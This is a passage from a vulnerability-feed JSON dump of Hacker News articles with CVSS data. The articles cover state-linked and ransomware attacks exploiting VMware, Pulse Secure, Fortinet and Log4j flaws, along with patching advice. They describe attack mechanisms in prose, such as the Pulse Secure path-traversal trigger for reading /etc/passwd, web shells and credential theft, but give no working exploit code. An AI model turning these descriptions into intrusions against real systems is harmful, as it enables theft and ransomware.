bulletin](<https://us-cert.cisa.gov/ncas/current-activity/2020/12/03/vmware-releases-security-updates-address-cve-2020-4006>) encouraging administrators to review and apply and patch as soon as possible.\n\nTracked as **CVE-2020-4006**, the [command injection](<https://owasp.org/www-community/attacks/Command_Injection>) vulnerability was originally given a CVSS score of 9.1 out of a maximum of 10 but was revised last week to 7.2 to reflect the fact that a malicious actor must possess valid credentials for the configurator admin account in order to attempt exploitation.\n\n\"This account is internal to the impacted products and a password is set at the time of deployment,\" VMware said in its [advisory](<https://www.vmware.com/security/advisories/VMSA-2020-0027.html>). \"A malicious actor must possess this password to attempt to exploit CVE-2020-4006.\"\n\nAlthough VMware didn't explicitly mention the bug was under active exploitation in the wild, according to the NSA, adversaries are now leveraging the flaw to launch attacks to pilfer protected data and abuse shared authentication systems.\n\n\"The exploitation via command injection led to installation of a web shell and follow-on malicious activity where credentials in the form of SAML authentication assertions were generated and sent to Microsoft Active Directory Federation Services, which in turn granted the actors access to protected data,\" the agency said.\n\n[SAML](<https://en.wikipedia.org/wiki/Security_Assertion_Markup_Language>) or Security Assertion Markup Language is an open standard and an XML-based markup for exchanging authentication and authorization data between identity providers and service providers to facilitate single sign-on ([SSO](<https://en.wikipedia.org/wiki/Single_sign-on>)).\n\nBesides urging organizations to update affected systems to the latest version, the agency also recommended securing the management interface with a strong, unique password.\n\nFurthermore, the NSA advised enterprises to regularly monitor authentication logs for anomalous authentications as well as scan their server logs for the presence of \"exit statements\" that can suggest possible exploitation activity.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-12-08T05:44:00", "type": "thn", "title": "NSA Warns Russian Hacker Exploiting VMware Bug to Breach Corporate Networks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-4006"], "modified": "2020-12-08T05:44:01", "id": "THN:2E67A9601D631B7905DA9FA7D2923108", "href": "https://thehackernews.com/2020/12/nsa-warns-russian-hacker-exploiting.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:30", "description": "[](<https://thehackernews.com/images/-_SvUUuvh0ss/XpmKGXtsseI/AAAAAAAAAPI/SuMNxubahJUd3z_eE6vcjjgsuPoYjkdawCLcBGAsYHQ/s728-e100/pulse-secure-vpn-vulnerability-2.jpg>)\n\nThe United States Cybersecurity and Infrastructure Security Agency (CISA) yesterday issued a [fresh advisory](<https://www.us-cert.gov/ncas/alerts/aa20-107a>) alerting organizations to change all their Active Directory credentials as a defense against cyberattacks trying to leverage a known remote code execution (RCE) vulnerability in Pulse Secure VPN servers\u2014even if they have already patched it. \n \nThe warning comes three months after another [CISA alert](<https://www.us-cert.gov/ncas/alerts/aa20-010a>) urging users and administrators to [patch Pulse Secure VPN](<https://www.us-cert.gov/ncas/current-activity/2019/10/16/multiple-vulnerabilities-pulse-secure-vpn>) environments to thwart attacks exploiting the vulnerability. \n \n\"Threat actors who successfully exploited CVE-2019-11510 and stole a victim organization's credentials will still be able to access \u2014 and move laterally through \u2014 that organization's network after the organization has patched this vulnerability if the organization did not change those stolen credentials,\" CISA said. \n \nCISA has also [released a tool to help](<https://github.com/cisagov/check-your-pulse>) network administrators look for any indicators of compromise associated with the flaw. \n \n\n\n## A Remote Code Execution Flaw\n\n \nTracked as [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>), the pre-authentication arbitrary file read vulnerability could allow remote unauthenticated attackers to compromise vulnerable VPN servers and gain access to all active users and their plain-text credentials, and execute arbitrary commands. \n \n\n\n[](<https://thehackernews.com/images/-9lA8I2RLHGU/XpmBkUgmolI/AAAAAAAA2qg/xhY8D8d5TDs7mVoKQo3kFZmB8fmEu1yvwCLcBGAsYHQ/s728-e100/pulse-secure-vpn-vulnerability.jpg>)\n\n \nThe flaw stems from the fact that [directory traversal](<https://devco.re/blog/2019/09/02/attacking-ssl-vpn-part-3-the-golden-Pulse-Secure-ssl-vpn-rce-chain-with-Twitter-as-case-study/>) is hard-coded to be allowed if a path contains \"dana/html5/acc,\" thus allowing an attacker to send specially crafted URLs to read sensitive files, such as \"/etc/passwd\" that contains information about each user on the system. \n \nTo address this issue, Pulse Secure released an [out-of-band patch](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>) on April 24, 2019. \n \n[](<https://thehackernews.com/images/-JoiStCZj61c/XpmChlfPXpI/AAAAAAAAAO8/x_r1K3sIkukYxwR0UcxXPcNLaxvuDvrmQCLcBGAsYHQ/s728-e100/pulse-secure-vpn-vulnerability-1.jpg>) \n \nWhile on August 24, 2019, security intelligence firm Bad Packets was able to discover [14,528 unpatched](<https://badpackets.net/over-14500-pulse-secure-vpn-endpoints-vulnerable-to-cve-2019-11510/>) Pulse Secure servers, a subsequent scan as of last month yielded [2,099 vulnerable endpoints](<https://twitter.com/bad_packets/status/1242289478334427139>), indicating that a vast majority of organizations have patched their VPN gateways. \n \n\n\n## Unpatched VPN Servers Become Lucrative Target\n\n \nThe fact that there are still over thousands of unpatched Pulse Secure VPN servers has made them a lucrative target for bad actors to distribute malware. \n \nA report from ClearSky found Iranian state-sponsored [hackers using CVE-2019-11510](<https://thehackernews.com/2020/02/iranian-hackers-vpn-vulnerabilities.html>), among others, to penetrate and steal information from target IT and telecommunication companies across the world. \n \nAccording to an [NSA advisory](<https://media.defense.gov/2019/Oct/07/2002191601/-1/-1/0/CSA-MITIGATING-RECENT-VPN-VULNERABILITIES.PDF>) from October 2019, the \"exploit code is freely available online via the Metasploit framework, as well as GitHub. Malicious cyber actors are actively using this exploit code.\" \n \nIn a similar alert issued last year, the UK's National Cyber Security Centre ([NCSC](<https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities>)) warned that advanced threat groups are exploiting the vulnerability to target government, military, academic, business, and healthcare organizations. \n \nMore recently, [Travelex](<https://www.bbc.com/news/business-51017852>), the foreign currency exchange and travel insurance firm, became a victim after cybercriminals planted Sodinokibi (REvil) [ransomware](<https://doublepulsar.com/big-game-ransomware-being-delivered-to-organisations-via-pulse-secure-vpn-bd01b791aad9>) on the company's networks via the Pulse Secure vulnerability. Although the ransomware operators demanded a ransom of $6 million (\u00a34.6 million), a [Wall Street Journal](<https://www.wsj.com/articles/travelex-paid-hackers-multimillion-dollar-ransom-before-hitting-new-obstacles-11586440800>) report last week said it paid $2.3 million in the form of 285 Bitcoin to resolve its problem. \n \nIn the face of ongoing attacks, it's recommended that organizations upgrade their Pulse Secure VPN, reset their credentials, and scan for unauthenticated log requests and exploit attempts. \n \nCISA has also suggested removing any unapproved remote access programs and inspecting scheduled tasks for scripts or executables that may allow an attacker to connect to an environment. \n \nFor more steps to mitigate the flaw, head to [NSA's advisory here](<https://media.defense.gov/2019/Oct/07/2002191601/-1/-1/0/CSA-MITIGATING-RECENT-VPN-VULNERABILITIES.PDF>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-04-17T11:20:00", "type": "thn", "title": "CISA Warns Patched Pulse Secure VPNs Could Still Expose Organizations to Hackers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510"], "modified": "2020-04-17T11:20:03", "id": "THN:46994B7A671ED65AD9975F25F514C6E3", "href": "https://thehackernews.com/2020/04/pulse-secure-vpn-vulnerability.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:32", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEgcW-6sY33kcH0dmBIKaK9mpaBaPRVIHpXHjT6Hgy_cMiHxlaNJfxuW1eMvQDiHyvzDLYVJGlJVA2b_pyL6m02QdpItx8VmJbN4PgH539vr05iJNN2nhAyDflMWDr-NbNmKaPQvhSn59trm4goPShyfhF5aIO8nNOTMAMBWoNZZ5zvA73ryI_wfVzbT>)\n\nA \"potentially destructive actor\" aligned with the government of Iran is actively exploiting the well-known [Log4j vulnerability](<https://thehackernews.com/2022/01/microsoft-warns-of-continued-attacks.html>) to infect unpatched VMware Horizon servers with ransomware.\n\nCybersecurity firm SentinelOne dubbed the group \"**TunnelVision**\" owing to their heavy reliance on tunneling tools, with overlaps in tactics observed to that of a broader group tracked under the moniker [Phosphorus](<https://thehackernews.com/2022/01/iranian-hackers-exploit-log4j.html>) as well as Charming Kitten and Nemesis Kitten.\n\n\"TunnelVision activities are characterized by wide-exploitation of 1-day vulnerabilities in target regions,\" SentinelOne researchers Amitai Ben Shushan Ehrlich and Yair Rigevsky [said](<https://www.sentinelone.com/labs/log4j2-in-the-wild-iranian-aligned-threat-actor-tunnelvision-actively-exploiting-vmware-horizon/>) in a report, with the intrusions detected in the Middle East and the U.S.\n\nAlso observed alongside Log4Shell is the exploitation of Fortinet FortiOS path traversal flaw ([CVE-2018-13379](<https://thehackernews.com/2022/02/us-says-russian-hackers-stealing.html>)) and the Microsoft Exchange [ProxyShell](<https://thehackernews.com/2021/11/hackers-exploiting-proxylogon-and.html>) vulnerability to gain initial access into the target networks for post-exploitation.\n\n\"TunnelVision attackers have been actively exploiting the vulnerability to run malicious PowerShell commands, deploy backdoors, create backdoor users, harvest credentials and perform lateral movement,\" the researchers said.\n\nThe PowerShell commands are used as a launchpad to download tools like Ngrok and run further commands by means of reverse shells that are employed to drop a PowerShell backdoor that's capable of gathering credentials and executing reconnaissance commands.\n\nSentinelOne also said it identified similarities in the mechanism used to execute the reverse web shell with another PowerShell-based implant called [PowerLess](<https://thehackernews.com/2022/02/iranian-hackers-using-new-powershell.html>) that was disclosed by Cybereason researchers earlier this month.\n\nAll through the activity, the threat actor is said to have utilized a GitHub repository known as \"VmWareHorizon\" under the username \"protections20\" to host the malicious payloads.\n\nThe cybersecurity company said it's associating the attacks to a separate Iranian cluster not because they are unrelated, but owing to the fact that \"there is at present insufficient data to treat them as identical to any of the aforementioned attributions.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-18T07:40:00", "type": "thn", "title": "Iranian Hackers Targeting VMware Horizon Log4j Flaws to Deploy Ransomware", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2022-02-18T07:40:44", "id": "THN:F25FAD25E15EBBE4934883ABF480294D", "href": "https://thehackernews.com/2022/02/iranian-hackers-targeting-vmware.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-05-09T12:38:22", "description": "[](<https://thehackernews.com/images/-wqhJpW-QhTc/YG79n_lop2I/AAAAAAAACNY/ZnMOyKz8e6Adj5Hy8a5WXa_-MbqnDgRLwCLcBGAsYHQ/s0/cyberattack.jpg>)\n\nUnpatched Fortinet VPN devices are being targeted in a series of attacks against industrial enterprises in Europe to deploy a new strain of ransomware called \"Cring\" inside corporate networks.\n\nAt least one of the hacking incidents led to the temporary shutdown of a production site, said cybersecurity firm Kaspersky in a report published on Wednesday, without publicly naming the victim.\n\nThe attacks happened in the first quarter of 2021, between January and March.\n\n\"Various details of the attack indicate that the attackers had carefully analyzed the infrastructure of the targeted organization and prepared their own infrastructure and toolset based on the information collected at the reconnaissance stage,\" [said](<https://ics-cert.kaspersky.com/reports/2021/04/07/vulnerability-in-fortigate-vpn-servers-is-exploited-in-cring-ransomware-attacks/>) Vyacheslav Kopeytsev, a security researcher at Kaspersky ICS CERT.\n\nThe disclosure comes days after the Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) [warned](<https://us-cert.cisa.gov/ncas/current-activity/2021/04/02/fbi-cisa-joint-advisory-exploitation-fortinet-fortios>) of advanced persistent threat (APT) actors actively scanning for Fortinet SSL VPN appliances vulnerable to CVE-2018-13379, among others.\n\n\"APT actors may use these vulnerabilities or other common exploitation techniques to gain initial access to multiple government, commercial, and technology services. Gaining initial access pre-positions the APT actors to conduct future attacks,\" the agency said.\n\n[](<https://thehackernews.com/images/-5QwYhR-6pQ0/YG794Oq_4BI/AAAAAAAACNg/cbtbheKh0Z4gm3R1vdQ6cdPUmQT6WjUNwCLcBGAsYHQ/s0/hack.jpg>)\n\n[CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) concerns a path traversal vulnerability in the FortiOS SSL VPN web portal, which allows unauthenticated attackers to read arbitrary system files, including the session file, which contains usernames and passwords stored in plaintext.\n\nAlthough patches for the vulnerability were released in [May 2019](<https://www.fortiguard.com/psirt/FG-IR-18-384>), Fortinet said last November that it identified a \"[large number](<https://www.fortinet.com/blog/psirt-blogs/update-regarding-cve-2018-13379>)\" of VPN appliances that remained unpatched, while also cautioning that IP addresses of those internet-facing vulnerable devices were being sold on the dark web.\n\nIn a statement shared with The Hacker News, Fortinet said it had urged customers to upgrade their appliances \"on multiple occasions in [August 2019](<https://www.fortinet.com/blog/psirt-blogs/fortios-ssl-vulnerability>), [July 2020](<https://www.fortinet.com/blog/psirt-blogs/atp-29-targets-ssl-vpn-flaws>), and again in [April 2021](<https://www.fortinet.com/blog/psirt-blogs/patch-vulnerability-management>)\" following the May 2019 fix. \"If customers have not done so, we urge them to immediately implement the upgrade and mitigations,\" the company said.\n\nThe attacks aimed at European businesses were no different, according to Kaspersky's incident response, which found that the deployment of Cring ransomware involved the exploitation of CVE-2018-13379 to gain access to the target networks.\n\n\"Some time prior to the main phase of the operation, the attackers performed test connections to the VPN Gateway, apparently in order to make sure that the stolen user credentials for the VPN were still valid,\" Kaspersky researchers said.\n\nUpon gaining access, the adversaries are said to have used the Mimikatz utility to siphon account credentials of Windows users who had previously logged in to the compromised system, then utilizing them to break into the domain administrator account, move laterally across the network, and eventually deploy the Cring ransomware on each machine remotely using the Cobalt Strike framework.\n\n[Cring](<https://malpedia.caad.fkie.fraunhofer.de/details/win.cring>), a nascent strain that was first observed in January 2021 by telecom provider Swisscom, encrypts specific files on the devices using strong encryption algorithms after removing traces of all backup files and terminating Microsoft Office and Oracle Database processes. Following successful encryption, it drops a ransom note demanding payment of two bitcoins.\n\n[](<https://thehackernews.com/images/-zg8HygZ73Eo/YG7-LtYB1JI/AAAAAAAACNo/wj8rvRY9io4E_QWg643XIdI94kejG4D5gCLcBGAsYHQ/s0/cybersecurity.jpg>)\n\nWhat's more, the threat actor was careful to hide their activity by disguising the malicious PowerShell scripts under the name \"kaspersky\" to evade detection and ensured that the server hosting the ransomware payload only responded to requests coming in from European countries.\n\n\"An analysis of the attackers' activity demonstrates that, based on the results of the reconnaissance performed on the attacked organization's network, they chose to encrypt those servers which the attackers believed would cause the greatest damage to the enterprise's operations if lost,\" Kopeytsev [said](<https://usa.kaspersky.com/about/press-releases/2021_na-cring-ransomware-infects-industrial-targets-through-vulnerability-in-vpn-servers>).\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-08T13:12:00", "type": "thn", "title": "Hackers Exploit Unpatched VPNs to Install Ransomware on Industrial Targets", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2021-04-13T05:39:44", "id": "THN:FBDAEC0555EDC3089DC0966D121E0BCE", "href": "https://thehackernews.com/2021/04/hackers-exploit-unpatched-vpns-to.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-09-09T08:35:28", "description": "[](<https://thehackernews.com/images/-05Y4azfOtHY/YTmz5X6CzVI/AAAAAAAADwU/FmcJruB5qJM-D9XZtYFV-FPRYfwHpYpHwCLcBGAsYHQ/s0/vpng.jpg>)\n\nNetwork security solutions provider Fortinet confirmed that a malicious actor had unauthorizedly disclosed VPN login names and passwords associated with 87,000 FortiGate SSL-VPN devices.\n\n\"These credentials were obtained from systems that remained unpatched against [CVE-2018-13379](<https://www.fortiguard.com/psirt/FG-IR-18-384>) at the time of the actor's scan. While they may have since been patched, if the passwords were not reset, they remain vulnerable,\" the company [said](<https://www.fortinet.com/blog/psirt-blogs/malicious-actor-discloses-fortigate-ssl-vpn-credentials>) in a statement on Wednesday.\n\nThe disclosure comes after the threat actor leaked a list of Fortinet credentials for free on a new Russian-speaking forum called [RAMP](<https://ke-la.com/new-russian-speaking-forum-a-new-place-for-raas/>) that launched in July 2021 as well as on Groove ransomware's data leak site, with Advanced Intel [noting](<https://www.advintel.io/post/groove-vs-babuk-groove-ransom-manifesto-ramp-underground-platform-secret-inner-workings>) that the \"breach list contains raw access to the top companies\" spanning across 74 countries, including India, Taiwan, Italy, France, and Israel. \"2,959 out of 22,500 victims are U.S. entities,\" the researchers said.\n\n[](<https://thehackernews.com/images/-HU-9TZrc8Wo/YTm0pyWYXXI/AAAAAAAADwc/12l08TWEhOUM6FKznJkQu0G8qDlpbkrcACLcBGAsYHQ/s0/leak.jpg>)\n\n[CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) relates to a path traversal vulnerability in the FortiOS SSL VPN web portal, which allows unauthenticated attackers to read arbitrary system files, including the session file, which contains usernames and passwords stored in plaintext. \n\nAlthough the bug was rectified in May 2019, the security weakness has been [repeatedly](<https://thehackernews.com/2020/02/iranian-hackers-vpn-vulnerabilities.html>) [exploited](<https://thehackernews.com/2021/04/fbi-cisa-uncover-tactics-employed-by.html>) by [multiple](<https://thehackernews.com/2021/04/hackers-exploit-unpatched-vpns-to.html>) [adversaries](<https://thehackernews.com/2021/05/data-wiper-malware-disguised-as.html>) to deploy an array of [malicious payloads](<https://thehackernews.com/2021/05/top-11-security-flaws-russian-spy.html>) on unpatched devices, prompting Fortinet to issue a series of advisories in [August 2019](<https://www.fortinet.com/blog/psirt-blogs/fortios-ssl-vulnerability>), [July 2020](<https://www.fortinet.com/blog/psirt-blogs/atp-29-targets-ssl-vpn-flaws>), [April 2021](<https://www.fortinet.com/blog/psirt-blogs/patch-vulnerability-management>), and again in [June 2021](<https://www.fortinet.com/blog/psirt-blogs/prioritizing-patching-is-essential-for-network-integrity>), urging customers to upgrade affected appliances.\n\n[](<https://thehackernews.com/images/-qUrCccGMLeI/YTm0raORfPI/AAAAAAAADwg/R5dmT1pkUKwnRGYKr_SGB-GiTdIvnz1GACLcBGAsYHQ/s0/stats.jpg>)\n\nCVE-2018-13379 also emerged as one of the [top most exploited flaws](<https://thehackernews.com/2021/07/top-30-critical-security.html>) in 2020, according to a list compiled by intelligence agencies in Australia, the U.K., and the U.S. earlier this year.\n\nIn light of the leak, Fortinet is recommending companies to immediately disable all VPNs, upgrade the devices to FortiOS 5.4.13, 5.6.14, 6.0.11, or 6.2.8 and above followed by initiating an organization-wide password reset, warning that \"you may remain vulnerable post-upgrade if your users' credentials were previously compromised.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-09T07:16:00", "type": "thn", "title": "Hackers Leak VPN Account Passwords From 87,000 Fortinet FortiGate Devices", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2021-09-09T07:33:52", "id": "THN:8483C1B45A5D7BF5D501DE72F5898935", "href": "https://thehackernews.com/2021/09/hackers-leak-vpn-account-passwords-from.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-06-04T09:56:20", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEg6QgmIugjApGsSp_v-DgmrWh7TAwmgc2-q7he3aZA3LmwS3p9FJchpB4duBUG7J8wctZHQGDUg2jvObX6Lto5BZUAMDX2xH7JG8EDRyjRmSLmiaQl8rgHeOaQhlEL7oZDJgxSQOX8XlQiMQHLt36bKZAAJU2uaq2rKhruJOh9LNq60PhKcZc8Lj6Dn/s728-e100/hackers.jpg>)\n\nMicrosoft on Thursday said it took steps to disable malicious activity stemming from abuse of OneDrive by a previously undocumented threat actor it tracks under the chemical element-themed moniker Polonium.\n\nIn addition to removing the offending accounts created by the Lebanon-based activity group, the tech giant's Threat Intelligence Center (MSTIC) said it suspended over 20 malicious OneDrive applications created by Polonium andd that it notified affected organizations.\n\n\"The observed activity was coordinated with other actors affiliated with Iran's Ministry of Intelligence and Security (MOIS), based primarily on victim overlap and commonality of tools and techniques,\" MSTIC [assessed](<https://www.microsoft.com/security/blog/2022/06/02/exposing-polonium-activity-and-infrastructure-targeting-israeli-organizations/>) with \"moderate confidence.\"\n\nThe adversarial collective is believed to have breached more than 20 organizations based in Israel and one intergovernmental organization with operations in Lebanon since February 2022.\n\nTargets of interest included entities in the manufacturing, IT, transportation, defense, government, agriculture, financial, and healthcare sectors, with one cloud service provider compromised to target a downstream aviation company and law firm in what's a case of a supply chain attack.\n\nIn a vast majority of the cases, initial access is believed to have been obtained by exploiting a path traversal flaw in Fortinet appliances ([CVE-2018-13379](<https://thehackernews.com/2021/09/hackers-leak-vpn-account-passwords-from.html>)), abusing it to drop custom PowerShell implants like CreepySnail that establish connections to a command-and-control (C2) server for follow-on actions.\n\nAttack chains mounted by the actor have involved the use of custom tools that leverage legitimate cloud services such as OneDrive and Dropbox accounts for C2 with its victims using malicious tools dubbed CreepyDrive and CreepyBox.\n\n\"The implant provides basic functionality of allowing the threat actor to upload stolen files and download files to run,\" the researchers said.\n\nThis is not the first time Iranian threat actors have taken advantage of cloud services. In October 2021, Cybereason [disclosed](<https://thehackernews.com/2021/10/iranian-hackers-abuse-dropbox-in.html>) an attack campaign staged by a group called MalKamak that used Dropbox for C2 communications in an attempt to stay under the radar.\n\nAdditionally, MSTIC noted that multiple victims that were compromised by Polonium were previously targeted by another Iranian group called [MuddyWater](<https://thehackernews.com/2022/01/us-cyber-command-links-muddywater.html>) (aka Mercury), which has been characterized by the U.S. Cyber Command as a \"subordinate element\" within MOIS.\n\nThe victim overlaps lend credence to earlier reports that MuddyWater is a \"[conglomerate](<https://thehackernews.com/2022/03/iranian-hackers-targeting-turkey-and.html>)\" of multiple teams along the lines of Winnti (China) and the Lazarus Group (North Korea).\n\nTo counter such threats, customers are advised to enable multi-factor authentication as well as review and audit partner relationships to minimize any unnecessary permissions.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T09:19:00", "type": "thn", "title": "Microsoft Blocks Iran-linked Lebanese Hackers Targeting Israeli Companies", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2022-06-04T08:43:20", "id": "THN:8BA951AD00E17C72D6321234DBF80D19", "href": "https://thehackernews.com/2022/06/microsoft-blocks-iran-linked-lebanese.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-05-09T12:38:01", "description": "[](<https://thehackernews.com/images/-cKikIN2o4zA/YK5pX-ibrqI/AAAAAAAACpU/sp4zF_WZEkMPqmuvXXvmNfX9jnVnVLdkwCLcBGAsYHQ/s0/data-wiper-ransomware.jpg>)\n\nResearchers on Tuesday disclosed a new espionage campaign that resorts to destructive data-wiping attacks targeting Israeli entities at least since December 2020 that camouflage the malicious activity as ransomware extortions.\n\nCybersecurity firm SentinelOne attributed the attacks to a nation-state actor affiliated with Iran it tracks under the moniker \"Agrius.\"\n\n\"An analysis of what at first sight appeared to 